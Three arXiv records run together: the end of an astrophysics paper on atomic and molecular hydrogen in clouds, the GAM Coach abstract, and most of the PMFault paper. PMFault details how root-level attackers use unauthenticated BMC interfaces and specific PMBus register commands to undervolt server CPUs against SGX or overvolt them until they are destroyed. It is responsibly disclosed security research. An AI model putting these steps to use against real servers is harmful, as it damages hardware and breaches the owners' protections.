surprising especially in the weak-field limit where the FUV attenuation is governed purely by H\({}_{2}\) self-shielding, \(\tau_{\rm dust,tran}\ll 1\), and dust-shielding plays no role. Furthermore, at cloud depths beyond the transition points, i.e. within the molecular zones, the HI and H\({}_{2}\) density profiles as functions of \(\tau_{\rm dust}\), also depend on just \(\alpha G\), and are invariant with \(\tilde{\sigma}_{g}\) to a very good approximation. Within the fully atomic outer layers, and up to the invariant transition points, the H\({}_{2}\) profiles do depend on \(\tilde{\sigma}_{g}\), with H\({}_{2}\) fractions at the optically thin cloud edges that vary inversely with the dust abundance and the associated H\({}_{2}\) formation rate coefficient. Fig. 7 illustrates the behavior when cosmic rays are included. In this example we set \(\alpha G=1\) and \(\beta=0.1\) and present results for \(\tilde{\sigma}_{g}=0.1\), 1, and 10. In the upper panel we exclude CR attenuation, and in the lower panel CR is included according to Eq. (12). Once again, the blue and orange curves are the atomic and molecular fractions \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\), and the black curves are the integrated HI column densities. The red markers indicate the transition points, as do the vertical green dashed lines according to Eq. (A1). For the three values of \(\tilde{\sigma}_{g}\), the average H\({}_{2}\) self-shielding factor \(G=5.5\times 10^{-6}\), \(3\times 10^{-5}\), and \(1.3\times 10^{-4}\), and \(\alpha=1.8\times 10^{5}\), \(3.3\times 10^{4}\) and \(7.5\times 10^{3}\). As seen in Fig. 7 the corresponding molecular fractions at the cloud edges, \(2x_{\rm H_{2}}=4/\alpha\), are \(2.2\times 10^{-5}\), \(1.2\times 10^{-4}\), and \(5.3\times 10^{-4}\). When expressed in terms of the dust optical depth \(\tau_{\rm dust}\) (or equivalently \(\tilde{\sigma}_{g}\times N\)) the transition point is insensitive to \(\tilde{\sigma}_{g}\), and for our assumed \(\alpha G\) the transitions occur at \(\tau_{\rm dust}=0.2\). For our assumed \(\beta\) the cosmic rays do not affect the positions of the transition points (see Appendix). The cosmic-ray ionization rate is unaffected by the presence of dust, and in the absence of CR attenuation the HI profiles within the optically thick CRs do not depend on \(\tilde{\sigma}_{g}\) and the atomic fraction reaches the cosmic-ray floor \(x_{\rm HI}=4.8\times 10^{-2}\) (see upper panel). However, with CR attenuation, and when expressed as functions of the dust optical depth, the HI fractions in Figure 7: HI and H\({}_{2}\) fractions, \(x_{\rm HI}\) and \(2x_{\rm H_{2}}\) (blue and orange curves) and HI column densities, \(N_{\rm HI}\) (black curves) assuming \(\alpha G=1\), and \(\beta=0.1\), for \(\tilde{\sigma}_{g}=\)0.1, 1, and 10, without and with CR attenuation (upper and lower panels). The curves are plotted as functions of the dust optical depth \(\tau_{\rm dust}\), or equivalently \(\tilde{\sigma}_{g}\times N\), where \(N\) is the gas column density. crease with \(\tilde{\sigma}_{g}\) for a given \(\tau_{\rm dust}\) (see lower panel). This is simply because the CR attenuation depends on the gas _column_\(N=\tau_{\rm dust}/\sigma_{g}\). For our assumed CR attenuation power-law (Eq. [12]) with \(a=0.385\), \(x_{\rm HI}\) varies as \(\tilde{\sigma}_{g}^{0.385}\) at a given dust optical depth. In all cases the atomic fractions decrease with cloud depth ([Eq. 26]). We have verified by explicit computation that this overall behavior is maintained for the entire range of \(\alpha G\) and \(\beta\) in our model grids for \(\tilde{\sigma}_{g}\) from 0.1 to 10. ## 4 Summary In this paper we extend the analytic treatment presented by Sternberg et al. (2014) and Bialy & Sternberg (2016) (S14 and BS16) for the production of atomic hydrogen (HI) via FUV photodissociation at the boundaries of interstellar molecular (H\({}_{2}\)) clouds, to also include the effects of penetrating (low-energy) cosmic-rays for the growth of the total HI column densities. We focus on idealized one-dimensional gas slabs, consisting of outer photodissociation regions (PDRs) and inner cosmic-ray zones (CRZs). We compute the depth dependent steady-state abundances of the HI and H\({}_{2}\), in a balance between grain-surface formation of the H\({}_{2}\) and destruction via FUV photodissociation and cosmic-ray ionization. The FUV photodissociation rates are reduced by (standard) H\({}_{2}\) self-shielding, and dust absorption. For the cosmic-rays we assume either constant overall ionization rates, or models that include depth-dependent attenuation of the cosmic-ray fluxes. The physical parameters in the problem are (a) the free-space intensity, \(I_{\rm UV}\), of the FUV radiation and the associated H\({}_{2}\) photodissociation rate; (b) the free-space cosmic ray H\({}_{2}\) ionization rate, \(\zeta\); (c) the density, \(n\), of hydrogen nuclei, in atoms and molecules; (d) the H\({}_{2}\) formation rate coefficient \(R\); (e) the FUV dust absorption cross section \(\sigma_{g}\); (f) the gas temperature \(T\); and (g) a density enhancement factor, \(C\), for the cool CRZs relative to the warmer PDRs. An additional (chemical) parameter is the number, \(\phi\), of H\({}_{2}\) dissociations per cosmic-ray ionization event. The governing HI/H\({}_{2}\) formation-destruction equation that we solve is Eq. (1), or in differential form Eq. (13). The solutions for the HI and H\({}_{2}\) density profiles and the integrated HI columns, depend primarily on the ratios \(I_{\rm UV}/Rn\) and \(\zeta/Rn\), as encapsulated in our dimensionless parameters \(\alpha G\), and \(\beta\) (Eqs. [14], [15] and [23]). A third dimensionless parameter is the dust-to-gas ratio \(\tilde{\sigma}_{g}\). It sets the magnitude of both the dust absorption cross section, and the molecular formation rate coefficient. We solve Eq. (13) numerically, and we also develop simple analytic formulae for the growth of the HI column density in terms of \(\alpha G\) and \(\beta\) (Eqs. [19] and [22]). Our analytic formulae provide an excellent match to the numerical integrations. Our focus is on conditions (\(\beta\leq 1\)) for which the gas is primarily molecular in the optically thick cloud interiors. As we discuss in the Appendix, for these conditions cosmic-rays do not affect the locations of the HI-to-H\({}_{2}\) transition points. We consider both weak fields (\(\alpha G\ll 1\)) and strong fields (\(\alpha G\gg 1\)), and compute the critical cloud columns, \(N_{\rm crit}\), at which cosmic-rays dominate the production of the total HI columns. We write down analytic expressions for the critical columns. We also examine how the HI and H\({}_{2}\) profiles scale with the assumed dust-to-gas ratio. As an example, we apply our theory to Galactic giant molecular clouds (GMCs), with typical hydrogen gas column densities \(\sim 1.5\times 10^{22}\) cm\({}^{-2}\) (independent of mass). For GMCs we consider both plane-parallel slabs exposed to beamed FUV fields, and spherical clouds illuminated by isotropic radiation. For weak FUV fields, for which \(I_{\rm UV}/n\ll 3.4\times 10^{-2}\) cm\({}^{3}\), and with \(I_{\rm UV}=1\), the CRZ dominates the production of the HI if the free-space \(\zeta>5.1\times 10^{-16}\) s\({}^{-1}\). This estimate for the critical ionization rate includes cosmic-ray attenuation within the GMCs. For multiphased warm/cold HI within the PDRs, for which \(I_{\rm UV}/n\approx 3.4\times 10^{-2}\) cm\({}^{3}\), the CRZ dominates the HI if \(\zeta\gtrsim 4.5\times 10^{-16}\times(M_{\rm GMC}/10^{6}\ M_{\odot})^{-1/2}\) s\({}^{-1}\), where \(M_{\rm GMC}\) is the GMC mass. The very large critical ionization rates suggest that FUV photodissociation dominates the production of the HI in most Galactic GMCs. ## Acknowledgements We thank David Neufeld, Chris McKee, Eve Ostriker, and Mark Wolfire for discussions. We thank the referee for a careful reading of our manuscript and for helpful comments. This work was supported by the German Science Foundation via DFG/DIP grant STE/ 1869-2 GE/ 625 17-1, by the Center for Computational Astrophysics (CCA) of the Flatiron Institute, and by the Mathematical and Physical Sciences (MPS) division of the Simons Foundation, USA.
2302.14165
GAM Coach: Towards Interactive and User-centered Algorithmic Recourse
Machine learning (ML) recourse techniques are increasingly used in high-stakes domains, providing end users with actions to alter ML predictions, but they assume ML developers understand what input variables can be changed. However, a recourse plan's actionability is subjective and unlikely to match developers' expectations completely. We present GAM Coach, a novel open-source system that adapts integer linear programming to generate customizable counterfactual explanations for Generalized Additive Models (GAMs), and leverages interactive visualizations to enable end users to iteratively generate recourse plans meeting their needs. A quantitative user study with 41 participants shows our tool is usable and useful, and users prefer personalized recourse plans over generic plans. Through a log analysis, we explore how users discover satisfactory recourse plans, and provide empirical evidence that transparency can lead to more opportunities for everyday users to discover counterintuitive patterns in ML models. GAM Coach is available at: https://poloclub.github.io/gam-coach/.
Zijie J. Wang, Jennifer Wortman Vaughan, Rich Caruana, Duen Horng Chau
2023-02-27T21:57:42Z
http://arxiv.org/abs/2302.14165v2
# GAM Coach: Towards Interactive and User-centered Algorithmic Recourse ###### Abstract. Machine learning (ML) recourse techniques are increasingly used in high-stakes domains, providing end users with actions to alter ML predictions, but they assume ML developers understand what input variables can be changed. However, a recourse plan's actionability is subjective and unlikely to match developers' expectations completely. We present GAM Coach, a novel open-source system that adapts integer linear programming to generate customizable counterfactual explanations for Generalized Additive Models (GAMs), and leverages interactive visualizations to enable end users to iteratively generate recourse plans meeting their needs. A quantitative user study with 41 participants shows our tool is usable and useful, and users prefer personalized recourse plans over generic plans. Through a log analysis, we explore how users discover satisfactory recourse plans, and provide empirical evidence that transparency can lead to more opportunities for everyday users to discover counterintuitive patterns in ML models. GAM Coach is available at: [https://poloclub.github.io/gam-coach/](https://poloclub.github.io/gam-coach/). 2022
2301.05538
PMFault: Faulting and Bricking Server CPUs through Management Interfaces
Apart from the actual CPU, modern server motherboards contain other auxiliary components, for example voltage regulators for power management. Those are connected to the CPU and the separate Baseboard Management Controller (BMC) via the I2C-based PMBus. In this paper, using the case study of the widely used Supermicro X11SSL motherboard, we show how remotely exploitable software weaknesses in the BMC (or other processors with PMBus access) can be used to access the PMBus and then perform hardware-based fault injection attacks on the main CPU. The underlying weaknesses include insecure firmware encryption and signing mechanisms, a lack of authentication for the firmware upgrade process and the IPMI KCS control interface, as well as the motherboard design (with the PMBus connected to the BMC and SMBus by default). First, we show that undervolting through the PMBus allows breaking the integrity guarantees of SGX enclaves, bypassing Intel's countermeasures against previous undervolting attacks like Plundervolt/V0ltPwn. Second, we experimentally show that overvolting outside the specified range has the potential of permanently damaging Intel Xeon CPUs, rendering the server inoperable. We assess the impact of our findings on other server motherboards made by Supermicro and ASRock. Our attacks, dubbed PMFault, can be carried out by a privileged software adversary and do not require physical access to the server motherboard or knowledge of the BMC login credentials. We responsibly disclosed the issues reported in this paper to Supermicro and discuss possible countermeasures at different levels. To the best of our knowledge, the 12th generation of Supermicro motherboards, which was designed before we reported PMFault to Supermicro, is not vulnerable.
Zitai Chen, David Oswald
2023-01-13T13:36:28Z
http://arxiv.org/abs/2301.05538v1
# PMFault: Faulting and Bricking Server CPUs through Management Interfaces ###### Abstract Apart from the actual CPU, modern server motherboards contain other auxiliary components, for example voltage regulators for power management. Those are connected to the CPU and the separate Baseboard Management Controller (BMC) via the I2C-based PMBus. In this paper, using the case study of the widely used Supermicro X11SSL motherboard, we show how remotely exploitable software weaknesses in the BMC (or other processors with PMBus access) can be used to access the PMBus and then perform hardware-based fault injection attacks on the main CPU. The underlying weaknesses include insecure firmware encryption and signing mechanisms, a lack of authentication for the firmware upgrade process and the IPMI KCS control interface, as well as the motherboard design (with the PMBus connected to the BMC and SMBus by default). First, we show that undervolting through the PMBus allows breaking the integrity guarantees of SGX enclaves, bypassing Intel's countermeasures against previous undervolting attacks like Plundervolt/VoltPwn. Second, we experimentally show that overvolting outside the specified range has the potential of permanently damaging Intel Xeon CPUs, rendering the server inoperable. We assess the impact of our findings on other server motherboards made by Supermicro and ASRock. Our attacks, dubbed PMFault, can be carried out by a privileged software adversary and do not require physical access to the server motherboard or knowledge of the BMC login credentials. We responsibly disclosed the issues reported in this paper to Supermicro and discuss possible countermeasures at different levels. To the best of our knowledge, the 12th generation of Supermicro motherboards, which was designed before we reported PMFault to Supermicro, is not vulnerable. Keywords:fault injection software-based faults Intel SGX under/overvolting ## 1 Introduction In recent years, the security implications of software-exposed power and clock management features have received substantial attention by the research community. Several attacks including CLKSCREW [17], Plundervolt [18], V0ltPwn [19], and VoltJockey [15] showed that undervolting or overclocking from software can be used to inject faults (e.g., bitflips) into computations and break Trusted Execution Environments (TEEs) like Intel Software Guard Extensions (SGX) and ARM TrustZone. Subsequent attacks like VoltPillager [14] and the work by Buhren et al. [1] showed that similar attacks can be mounted with direct access to the computer hardware, physically connecting to the control interface of the Voltage Regulator (VR). In particular, Chen et al. targeted the Serial Voltage Identification (SVID) interface used by Intel CPUs to set the desired supply voltage. However, apart from SVID, many systems, in particular servers, support a second interface, the so-called Power Management Bus (PMBus), to control the Voltage Regulator Module (VRM). PMBus is an open standard for digital power management [pmb] and has been adopted by more than 40 companies. It is based on the Inter-Integrated Circuit (I2C) bus and offers monitoring features apart from voltage and current control. Another component usually presents on server motherboards is the Baseboard Management Controller (BMC). This chip, intended to remotely manage the server even if e.g., the main CPU has crashed or is powered down, has connections to several buses and chips on the motherboard, including the I2C bus on which the VRM resides. Previous research on x86 platforms has focused on the software-hardware interface provided by the Central Processing Unit (CPU) itself and on the security within the perimeter of each individual component, e.g., the BMC [14] or Intel Management Engine (Intel ME) [13, 15, 16]. There is a lack of board-level security analysis that reviews the system and motherboard design and interactions between the different components: even if an individual part of the system is secure within its individual threat model, the combination of it with other parts can cause security risks. In our PMFault attacks, the privileged position of the BMC, combined with its large attack surface, makes it interesting from an adversary's perspective to exploit vulnerabilities of the system via power management features. ### Our Contribution Our main contributions in this paper are: _PMBus-based under/overvolting against server platforms:_ We first analyse the VRM management interface at the hardware level. We discovered that the semi-standardised PMBus can be used to control the CPU voltage. Using the case study of a widely-used server motherboard, the Supermicro X11SSL-CF, we explore this attack surface and show that software vulnerabilities in the BMC (or another programmable chip connected to the PMBus) can have severe consequences for the security and safety of the server platform. To determine if the vulnerabilities can affect other server motherboards, we also investigated the PMBus connections and usage on an ASRock E3C246D4I-2T and a Supermicro X12DPi-NT6. _PMBus access through BMC exploits:_ We then study the BMC firmware and--based on prior work in [1, 18, 19]--found that it can indeed be exploited to send arbitrary PMBus commands to control the voltage of the CPU. More precisely, several software vulnerabilities in the BMC, including incorrect firmware encryption and signing mechanisms, a lack of authentication for firmware upgrades and control interfaces, an attacker can manipulate the CPU voltage remotely because the PMBus is connected to the BMC and the System Management Bus (SMBus) by default. _PMBus-based undervolting against SGX enclaves:_ With this, we observed the same faults as with Plundervolt/VoltPwn (CVE-2019-11157), including for code running inside an SGX enclave. As the BMC has an independent, external flash chip for its firmware, SGX attestation currently _does not_ have the ability to verify its status. Crucially, because the software voltage-control interface in Model Specific Register (MSR) 0x150 is not used, Intel's fix for CVE-2019-11157 does not address this attack. _Permanent denial-of-service through overvolting:_ We also discovered a novel overvolting attack: by sending a certain sequence of PMBus commands, we can set the CPU voltage outside the specification (as high as 2.84 V) and permanently brick the Xeon CPU used in our experiments. _Countermeasures and mitigations:_ Finally, we develop the PMBusDetect tool for detecting if the VRM is connected to the PMBus, and then discuss countermeasures and challenges in securing server platforms. Importantly, we point out that TEEs like SGX must not only rely on the security of the CPU itself, but also of that of management components the hardware design of the platform. The details of our experiments and source code can be found at: [https://github.com/zt-chen/PMFault](https://github.com/zt-chen/PMFault). CVE number CVE-2022-43309 has been reserved for PMFault. ### Adversary Model In this paper, we assume a privileged software attacker, _i.e._, who has obtained root on the host CPU. This is the standard adversary model in the case of TEEs like SGX, and is also realistic in the case of overvolting to permanently destroy the CPU, which could be e.g., exploited by ransomware with root rights. Notably, our attacks do not require physical access (for additional hardware to be added to the system) and can thus be conducted remotely e.g., over SSH. ### Responsible Disclosure We have responsibly disclosed our findings to Intel and Supermicro in April 2022. We discussed the details of our methods in several calls with Supermicro, and they acknowledge the existence of the issue and are looking into deploying fixes for their 11th generation products like the Supermicro X11SSL-CF. Supermicro highlighted that the attacks do not replicate on their 12th generation, which e.g., include secure boot and update for the BMC and filtering on PMBus commands. Both of these features break the attack chains described in the paper. Intel considered the issue in the context of their own server motherboards and did not find them vulnerable. Intel did not comment on the impact on SGX. ### Related Work Since Boneh et al.'s seminal work on fault injection [1], the research community has devoted substantial efforts to investigating fault attacks and developing according countermeasures (cf. e.g., [1] for an overview). Software-based Fault InjectionOften, fault injection was considered a technique limited to attacks with physical access to the target. However, with the discovery of the Rowhammer effect [13], it was shown that faults can also be injected from software (through specific memory access patterns in the case of Rowhammer). Then, in 2017, Tang et al. showed that the clock management features of ARM processors can be exploited to inject faults into computations shielded inside a TEE like ARM TrustZone [14]. Similarly, Plundervolt, VoltPwn, and VoltJockey [15, 16, 17] (all tracked via CVE-2019-11157) use the software-exposed voltage control MSR in Intel processors to break the integrity guarantees of SGX enclaves. In response, Intel deployed a microcode update that disables the undervolting interface in MSR 0x150 and allows remote parties to verify correct configuration through SGX's remote attestation. Thus, purely software-based undervolting attacks against Intel processors were considered no longer possible. Hardware-based Fault Injection on TEEsThe second generation of undervolting attacks on TEEs like SGX and AMD Secure Encrypted Virtualization (SEV) require physical access to the target motherboard. In the case of VoltPillager [18], the adversary attaches two wires to the data and clock lines of the SVID bus and can then control the VRM external to the CPU, enabling undervolting even if Intel's microcode fixes for CVE-2019-11157 are installed. For AMD SEV, the adversary does not glitch the actual CPU, but the separate security co-processor, the AMD Secure Processor (SP) [10]. The adversary then proceeds to upload custom firmware to the SP to leak memory encryption keys and also endorsement secrets, which ultimately enable attacks without permanent physical access. Security of servers and BMCsIndependent of hardware-based attacks, the security of server platforms has received attention in the research community and wider society. In 2018, Bloomberg published a--since widely disproven--article that _incorrectly_ claimed the inclusion of small backdoor chips on Supermicro motherboards [14]. However, at the same time, researchers at Eclypisum showed that it is indeed possible to maliciously manipulate the BMC firmware of Supermicro motherboards from 8th to 11th generation [1], without the need to add a hardware implant. They also demonstrated how flashing corrupted BMC firmware can "brick" the server system by preventing it to boot. Niewohner [13] subsequently published a tool to exploit the (weak) firmware encryption of Supermicro BMCs. Other work, for example by Waisman et al. [12] and Perigaud et al. [14], has shown that software weaknesses in BMCs are not limited to Supermicro motherboards, but also applied to Dell, HP, and Lenovo systems. However, the implications of direct access to the PMBus from a compromised BMC have not been deeply studied to our knowledge. ### Paper Outline The remainder of this paper is structured as follows: in Section 2, we review the PMBus protocol and analyse its specific implementation and usage on Supermicro motherboards. Then, in Section 3, we describe Supermicro's BMC implementation and methods to modify the firmware. In Section 4, we experimentally investigate how a compromised BMC can interact with the VRM through the PMBus. We then use this to develop over/undervolting attacks in Section 5, before concluding in Section 7. ## 2 Analysis of Power Management Bus We started our work by analysing how the PMBus is used on practical server motherboards. PMBus is an interface that is used to control the VRM, supplying the power to the CPU. The most recent public available specification is version 1.3 [pmb]. This specification standardises the physical interface, packet structure, and command set of the PMBus. However, some commands are left as "manufacturer specified", so that each VRM manufacturer can have a slightly different implementation of the command set. This matches what we found during our investigation of the MP2955 VRM on the Supermicro X11SSL-CF platform described in the following. ### Experimental Setup We carried out initial experiments with an Intel Xeon E3-1220 v6 (CPU family: 6, model: 158, microcode version: 0xea) on a Supermicro X11SSL-CF Rev 1.01 motherboard (BMC microcontroller ASPEED AST2400, firmware revision 01.63, BIOS version: 2.4).We used 64-bit Ubuntu 18.04.3 LTS with a stock 5.4.0-107-generic kernel, Intel SGX driver V2.11.0, and Intel SGX-SDK V2.15.100.3. We refer to this system as E3-1220V6-X11SSL-CF throughout the paper. An overview of the server motherboard representative for Supermicro's 11th generation products is shown in Figure 1. The target of the PMFault attack is an Intel CPU with SGX technology. As mentioned, our actual attacks do not require additional hardware or physical access to the system, though we soldered some wires to the motherboard during the analysis phase. On Intel platforms, the voltage of the CPU is controlled by an external VRM Integrated Circuit (IC). The CPU connects to the VRM via the SVID bus to control the voltage supplied by it. This interface for CPU voltage control is present on all desktop and server motherboards. However, server VRMs--including the Supermicro X11SSL-CF--often have an additional I2C-based communication interface called PMBus. This interface allows e.g., overclocking or fine-tuning of the CPU voltage. One of the crucial steps in the PMFault is to get access to this interface and understand the communication protocol, so that we gain full control of the CPU voltage. One of the design issues we found on our server motherboard is that the PMBus can be directly connected to the more general SMBus. There are various components on the system on that bus, including the CPU, BMC, and other I2C devices. A compromise of any of these components leads to the takeover of PMBus and thus control of the CPU voltage. In this paper, we use the BMC as the starting point of the attack, as it commonly exists on server platforms. In order to analyse the attack surface of the BMC, we further investigated its connection and hardware design on the Supermicro X11SSL-CF. First, we found that its firmware is stored in a Serial Peripheral Interface (SPI) flash chip, separate from the BIOS flash. We also found there are two Ethernet ports on the system for communication with the BMC: one is called "Management Ethernet" and is dedicated for server management. The other port can be shared between CPU and BMC so that devices on this Ethernet port can communicate with both CPU and BMC. Finally, the BMC also has a Keyboard Controller Style (KCS) interface that enables direct access from the Operating System (OS) running on the CPU. These management interfaces open a large attack surface on the BMC, and make remote attacks possible. ### Protocol Structure To be able to eavesdrop and forge PMBus commands, knowledge of the protocol structure shown in Figure 2 is necessary. The PMBus is an I2C-based protocol (with clock speed of 100 kHz-1 MHz and an open-drain data pin) and uses a master-slave communication mechanism. The master device can query or change the setting of the slave device. Each slave device is assigned a unique 7-bit device address. The master device first sends a starting bit to initiate a transmission. During transmission, every group of 9 bits forms a segment, with the 9th bit indicating ACK (0) or NACK (1) for every 8 bits received. The starting bit and the (N)ACK mechanism are handled at hardware level and do not need to be handled manually. The first segment is always sent by the master. The first 7 bits are the address of the target slave, and the 8th bit indicates whether this transmission is a read (1) or write (0). Figure 1: Overview of the connections on the server motherboard. The second segment is the register address to operate on. In the PMBus specification, this segment is called the _PMBus command_. The segments after the second one contain the data read from or written to the register. Interaction between PMBus and SVIDAlthough the functionality of the PMBus protocol is similar to SVID, they have different specifications for the digital signal interface and command sets. A VRM can have both SVID and PMBus interfaces, with the SVID interface directly connected to the CPU and the PMBus interface connected to the SMBus. Both interfaces can be used to control the voltage of the CPU, and some implementations of the PMBus specification also have commands to override the voltages set through the SVID interface. ### PMBus Commands For an adversary to communicate with the VRM and e.g., configure voltage levels, they also need to know the specific PMBus commands. As mentioned, the PMBus specification allows manufacturers to have custom implementations of PMBus commands. The E3-1220V6-X11SSL-CF motherboard features an Monolithic Power MP2955 voltage regulator. To understand the PMBus implementation of this VRM, we first started looking for its datasheet, but unfortunately, found that it is not publicly available. However, on the Monolithic Power website1, we found the datasheet of an alternative VRM (MP2965) [Mon]. As both chips are manufactured by the same company, we used this datasheet as a reference and starting point to discover the available PMBus commands by analysing the PMBus traffic on the Supermicro X11SSL-CF. Footnote 1: [https://www.monolithcpower.com/](https://www.monolithcpower.com/) We found the relevant PMBus commands by reading and analysing the response (ACK or NACK) of the registers, and validating found commands according to the PMBus specification and the MP2965 datasheet : Table 1 gives the command name, command code, and description of each commands. The first three commands in the table are implemented according to the PMBus 1.3 specification [pmb], while the rest are manufacturer-specific. \begin{table} \begin{tabular}{l l l} \hline \hline Command name & Command code & Usage \\ \hline CMD\_PAGE & 0x00 & Switch between different voltage rails \\ CMD\_OPERATION & 0x01 & PMBus override \\ VOUT\_COMMAND & 0x21 & Output voltage settings \\ READ\_VOUT & 0x8B & Voltage reading from sensor \\ MFR\_VR\_CONFIG & 0xE4 & Enable overclock mode \\ MFR\_OCP\_TOTAL\_SET & 0xEE & Over-current protection configuration \\ \hline \hline \end{tabular} \end{table} Table 1: Discovered PMBus commands on E3-1220V6-X11SSL-CF. Figure 2: PMBus protocol structure With CMD_OPERATION, we can configure the operation mode of the VRM. By setting bit 1 of this register, we can enable the PMBus override mode. In this mode, the voltage configured in the VOUT_COMMAND register will override the voltage configuration from the SVID bus. Another command that is useful for PMFAULT is READ_VOUT, as it allows us to read the current voltage of the CPU and establish a baseline for undervolting. The MFR_VR_CONFIG register is manufacturer-specific. By setting bit 3 or bit 10 and configuring CMD_OPERATION, we could enable the tracking or fixed voltage overclocking mode, respectively. Bit 8 VID_STEP_SEL of MFR_VR_CONFIG also allow us to use an alternative mode of SVID. In this mode, the VRM uses 10 mV Voltage Identifier (VID) steps instead of the default of 5 mV. This makes overvolting up to 3 V possible, which is well beyond the operating voltage range of the E3-1220 V6 Intel CPU, with a maximum voltage of 1.52 V [11]. We also discovered that the VRM has an Over Current Protection (OCP) circuit, which can be configured or disabled by another manufacturer-specific register (MFR_OCP_TOTAL_SET). Some VRM also support multiple voltage output rails. CMD_PAGE command is used to select the target rail to send the commands to. With these discovered commands, we can now control the CPU voltage through the PMBus. In Section 4.1, we detail how this interface is used as part of attack chains for undervolting and overvolting attacks. ### Jumper Settings On the Supermicro X11SSL-CF motherboard, there are several jumpers that control different functionalities, including the connection of the VRM to other parts of the system. We kept all jumpers in the default status as delivered by the vendor. To avoid confusion, we still list the jumper settings in Table 2. During inspection of the jumper settings, we discovered that the SMBDAT_VRM and SMBCLK_VRM jumpers are neither mentioned in the user manual [Supb] nor in the quick reference guide [Supa]. Using an oscilloscope while sending PMBus commands, we found that these two jumpers can be used for (dis)connecting the VRM from/to the PMBus. The experiments and attacks described in this paper are conducted under the "connected" setting of both jumpers, which according to Supermicro is the default. We also found server motherboard without such jumpers, e.g., Supermicro X11SPG-TF and ASRock E3C246D4-2T. For those, the VRM is always connected to the BMC. We detail our finding on other motherboards in Section 6. It is worth mentioning that to the best of our knowledge, SGX attestation does not have the functionality to include the configuration of these (external) jumpers. ## 3 Supermicro's BMC and Server Management Interface Having understood the basic PMBus protocol and commands, we next look at different ways to gain access to the PMBus and send commands to the VRM. To achieve that, an attacker needs access to the SMBus. As described in Section 2.1, on E3-1220V6-X11SSL-CF, one of the devices on the SMBus is the ASPEED AST2400 BMC controller. In this \begin{table} \begin{tabular}{c l} \hline \hline Jumper name & Description \\ \hline JPME2 & Manufacturer mode normal (Default) \\ JPB1 & BMC enabled (Default) \\ SMBDAT\_VRM & Connect VRM data line to PMBus \\ SMBCLK\_VRM & Connect VRM clock line to PMBus \\ \hline \hline \end{tabular} \end{table} Table 2: Jumper settings on Supermicro X11SSL-CF. section, we introduce the functionalities and vulnerabilities in these management interfaces that allow us to achieve our main goal--to take control of the SMBus. During the initial investigation of the BMC, we found there are mainly three services available: there is a web service running on port 80 (HTTP) and 443 (HTTPS), an Intelligent Platform Management Interface (IPMI) over LAN service on port 623, and the SSH service on port 22. Besides, we also found that the IPMI service can be accessed through the KCS interface from the CPU. Some of these interfaces require authentication: to use HTTP, HTTPS, SSH, and IPMI -over-LAN, all exposed through Ethernet, one has to authenticate to the BMC. The used credentials in this authentication process are individual for each Supermicro motherboard. However, the IPMI-over-KCS interface does not require any authentication to the BMC. Instead, having root privileges on the host OS running on the CPU is sufficient to access this interface. One can also use the IPMI-over-KCS interface to add/remove/modify BMC credentials to subsequently login to the Ethernet-exposed interfaces. ### SSH Shell Since SSH is one of the most common interfaces that allows us to get a shell and possibly take over the system, we first started our investigation with it. However, the SSH service on E3-1220V6-X11SSL-CF provides a custom shell called "ATEN SMASH-CLP System Management Shell". It only provides limited commands that enable server monitoring and basic management. Previously, a vulnerability was reported in [14]: the command shell sh allows gaining root access from this shell, however, this command was not available on our system-under-investigation. ### BMC Firmware Analysis To further investigate the services running on the BMC and check if it is possible to enable an SSH root shell, we dumped the firmware of the BMC with a CH341A SPI flash programmer as shown in Figure 3. This procedure is only used once to assist our analysis, and is not necessary to execute the actual attack. We found that the firmware stored in the SPI flash is neither encrypted nor signed. There are five partitions in the firmware, where the second one contains a Linux operating system. The SMASH shell is provided by /SMASH/msh and it is possible to change it to a different shell by replacing this file. The Linux operating system also has an I2C kernel module installed, which provides an interface to communicate with the SMBus. However, during our testing in Section 4.1, we found that the API provided by this kernel module is not compatible with the commonly Figure 3: Dumping BMC firmware with a flash programmer. used libi2c in i2c-tool2. As the result, in Section 4.1, we opted to write a custom library to use the I2C interface of the BMC and communicate with the VRM. Footnote 2: [https://git.kernel.org/pub/scm/utils/i2c-tools/i2c-tools.git/](https://git.kernel.org/pub/scm/utils/i2c-tools/i2c-tools.git/) ### Firmware Upgrade After analysing the firmware, we conclude that it is possible to enable an SSH shell by modifying the firmware. We then started to look for software methods to re-flash the BMC SPI flash chip. We found that the firmware upgrade functionality of the BMC provides a way to do this. There are two interfaces for firmware upgrade: one is through the web interface, the other through the KCS interface. Through Web InterfaceThe web interface has a firmware upgrade page that can switch the BMC into upgrade mode and allows the user to upload a BMC firmware update package. To prevents unauthorised user from upgrading the firmware, there is a login portal. The user is authenticated by the BMC. As the BMC is a system independent from the OS running on the CPU, users do not need to have privileged access to the OS to be able to use this method. Besides, this web interface can be accessed remotely through Ethernet. The remote BMC firmware upgrade attack chain described in Section 4.3 uses this method to upgrade the firmware. Through IPMI-over-KCS InterfaceCrucially, the BMC firmware can also be updated through the KCS interface, using the following command: AlUpdate -f firmware.bin -i kcs -r y. As mentioned, the KCS interface can be accessed from the OS running on the CPU, only requiring root access to the OS, _but not the BMC credentials_. Firmware Upgrade PackageAfter finding the firmware upgrade interface, the next step is to produce an upgrade package that can be uploaded to the BMC. We started with the analysis of the structure of the upgrade package. Figure 4 shows the layout of a firmware upgrade package. Previous work by [1] founds that in the firmware upgrade package, there is a region that contains a magic value (\(\mathtt{ATENs\_FW}\)), a half-length CRC checksum, and the length of each section. We call this part the firmware footer. There is also a region containing metadata of the firmware image, including the name of each region and their length and CRC, starting with "[img]". We refer to this region as firmware table. In the X11 series, the firmware table, the _file system header_ of the root file system and the website _files system header_ are AES-CBC encrypted. However, the files in these regions are not encrypted, but only LZMA compressed. As a result, the key of the AES-CBC encryption can be recovered from the ipmi.so file on the root file system. With this information, we can modify the firmware and construct a valid firmware upgrade package for the web interface. We discuss firmware repacking in detail in Section 4.2. ### IPMI I2C functionality When exploring the functionalities of IPMI, we also found that the interface also allows direct sending I2C packets with the ipmitool i2c command. This can be used either through the Ethernet or KCS IPMI channel. The authentication requirement for using IPMI-controlled I2C is the same as those described in Section 3.3. As shown in Section 4.3, we can use this functionality for direct access to the SMBus/PMBus _without_ modifying BMC firmware. ## 4 Practical Experiments Finally, using the results from the previous sections, we explain how to construct practical Proof-of-Concept (PoC) attacks for PMFault. Some of our experiments require physical access to the system to understand the hardware configuration (with an overview shown in Figure 5). Note however that physical access is not required when performing PMFault attacks on a real-world system, as the hardware components and connections are identical for a given motherboard model. ### PMBus-based Voltage Control To understand the configuration and capabilities of using the PMBus to control the CPU voltage, we conducted two experiments. Firstly, we used the "probe and verify" method to find the I2C address of the VRM. Then we tried different ways of sending commands to VRM to change the 